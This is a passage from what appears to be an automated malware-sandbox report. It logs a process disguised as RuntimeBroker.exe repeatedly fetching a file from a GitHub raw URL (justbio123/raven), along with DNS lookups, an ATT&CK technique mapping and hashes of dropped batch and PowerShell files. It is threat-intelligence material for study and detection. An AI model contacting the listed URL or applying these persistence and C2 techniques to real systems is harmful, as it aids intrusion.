ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:26:28 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600046-LCY
X-Cache: HIT
X-Cache-Hits: 3
X-Timer: S1734863188.454069,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e0088b078be7126e2029be86b7c07d865d32549a
Expires: Sun, 22 Dec 2024 10:31:28 GMT
Source-Age: 191
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

86.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.49.80.91.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:26:42 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600040-LCY
X-Cache: HIT
X-Cache-Hits: 3
X-Timer: S1734863203.904111,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 17502742c85b11f5c022c9a86d0968423c28ca36
Expires: Sun, 22 Dec 2024 10:31:42 GMT
Source-Age: 206
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:26:49 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600032-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863210.755402,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ad9d6afe1f3b94a434be9bf460607c1f6360ba39
Expires: Sun, 22 Dec 2024 10:31:49 GMT
Source-Age: 213
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:27:03 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600060-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863224.871670,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 4c5e9801ddd7c1b7502f5e9fd39dd87522bdf3d8
Expires: Sun, 22 Dec 2024 10:32:03 GMT
Source-Age: 227
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:27:09 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420142-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863230.966694,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9920210d315032d05ec40ea4d591f2e881d2e70e
Expires: Sun, 22 Dec 2024 10:32:09 GMT
Source-Age: 169
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:27:17 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420097-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863237.119732,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a98c8f242649dd7c6658077d81edf9800c0ca9fe
Expires: Sun, 22 Dec 2024 10:32:17 GMT
Source-Age: 176
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:27:29 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420084-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863249.178586,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c4eb37f487c39c9f1624df3890909731c9de50ad
Expires: Sun, 22 Dec 2024 10:32:29 GMT
Source-Age: 188
DNS

30.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.243.111.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:27:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600087-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863259.245176,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c96875bd9988cda2d4e9ee515ed870a69e780f01
Expires: Sun, 22 Dec 2024 10:32:39 GMT
Source-Age: 262
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:27:50 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600049-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863270.037119,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: fe031c6001b79395b4ab90a32711215ac9f9760c
Expires: Sun, 22 Dec 2024 10:32:50 GMT
Source-Age: 273
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:28:01 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4230-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863282.861206,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d5809e92b59a4f4ff0828afff1cc7ce0bb246dac
Expires: Sun, 22 Dec 2024 10:33:01 GMT
Source-Age: 221
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:28:14 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4236-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863295.726333,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9bd63fff324879a1ab8eba1037b6e47811ed6084
Expires: Sun, 22 Dec 2024 10:33:14 GMT
Source-Age: 233
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

RuntimeBroker.exe

Remote address:

185.199.108.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 10:28:27 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600090-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734863308.652945,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9cdf020bdbb11584f3b19d0959e29bfb1d24dc6e
Expires: Sun, 22 Dec 2024 10:33:27 GMT
Source-Age: 1

185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

896 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

896 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

849 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.108.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

RuntimeBroker.exe

849 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

RuntimeBroker.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.108.133

185.199.111.133

185.199.110.133

185.199.109.133
8.8.8.8:53

133.108.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.108.199.185.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

86.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

86.49.80.91.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

30.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

30.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aaaac7c68d2b7997ed502c26fd9f65c2

SHA1
7c5a3731300d672bf53c43e2f9e951c745f7fbdf

SHA256
8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb

SHA512
c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60804e808a88131a5452fed692914a8e

SHA1
fdb74669923b31d573787fe024dbd701fa21bb5b

SHA256
064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61

SHA512
d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6Zqs8041Oe.bat

Filesize
248B

MD5
2336a055ad1c58142e5e518bbd213a95

SHA1
9539c0c978690293d89278bff62c06abb181236e

SHA256
49eac6d08d100ef8bde99ed0a7686148e948ba38ea58c50633412081f2acda39

SHA512
5c2e422d40a28c925b31978f158e80a7527c5f42ca175d8da0fa2acd0ed8f7b7bcfe94162bd9e7f66153e323aede02514147e11dbc0abe936470c9b405d7767a

Download Submit
C:\Users\Admin\AppData\Local\Temp\GTS4B5cy6p.bat

Filesize
248B

MD5
77a40e87f6d5be2c16c1fce2f56c2bef

SHA1
8e9c4708bf16533a23515ebdd5f9cea8483876d4

SHA256
69a79176ed764ff90ef606bfc7517b61e2235faa458dbfd938e8ba7bca08c0e7

SHA512
317cd08f7b6120128a3bbd4a8616c18bb49579b91cf38798794ccb45a3705fae7b2ddd0e300b731e61bed39dd2f6bf463faaff1b5a4399cc9fad389a40224ce0

Download Submit
C:\Users\Admin\AppData\Local\Temp\JGN3MoCgVZ.bat

Filesize
248B

MD5
ba95c4a8129ac8811a3610a98e9eb95c

SHA1
7d8c2b814d26453fadd1bd0750c56b803bc46c4c

SHA256
eb2e7bd5a5c235e3decce049e7a38b025e2f08147e9487e59c005f0a3cc21225

SHA512
748853c14196b546a69e1831aaf373428f433d43c7b786c7acabe909c38926ab7d0f1373361c93e3c571c4117b8ad0e9c55c4b50c06f9b37f26016efa9dd58f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\KLWAYFjljO.bat

Filesize
248B

MD5
a90ecd0cf9efacb3fa10d1d47e63136e

SHA1
062dab0aded3d6d86b47a65039a1ebf802ce2edc

SHA256
883e22c840057a59674225214df2b053a3dbbba32fe6c4c6598a07a3150a02de

SHA512
3755284972a087f1e34680ba52e1f6d79d3e91b1080045c372785321fd9247d5d4b6a82af25b786359121a406b8726e78ed48353132339bb8616cd7123e634df

Download Submit
C:\Users\Admin\AppData\Local\Temp\V61H6ynXXY.bat

Filesize
248B

MD5
0976cd74f4d81b596c19db0a79e19757

SHA1
fcdbba6ccfec1ad76a50048d4ae8c054744b8e61

SHA256
d3b0eb4d0a5f811945b92bd549f4f8415bc315c339a12061f8c65d945de7227c

SHA512
9b54366738a621d48dde3a1c3fc77dc4bcb7eb43c5aeb5607cb7c5a00f5ccf22bbd6be3758888d1ae7980fb0e1dd3980b456dafda89c3c3cbeccf417904b3b03

Download Submit
C:\Users\Admin\AppData\Local\Temp\VF9LbKHiRa.bat

Filesize
248B

MD5
e27d977adc6d13417d92e0fe72fb3318

SHA1
ffe243930be06744cfd3013aca42a51b6659b2b5

SHA256
c139736e312947d709d481a3a85f6044c9a9f63eddb0bc74e90a0ef85b92e3ad

SHA512
ac983e44461f6c00859bf5d791b8834efdeafb71c51c031b71ee947535c78451070210160e97cc77f293c57a38d5f9f21e284be87c9820d50cedd7d39cbc71e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3wfrqcdz.pbg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat

Filesize
248B

MD5
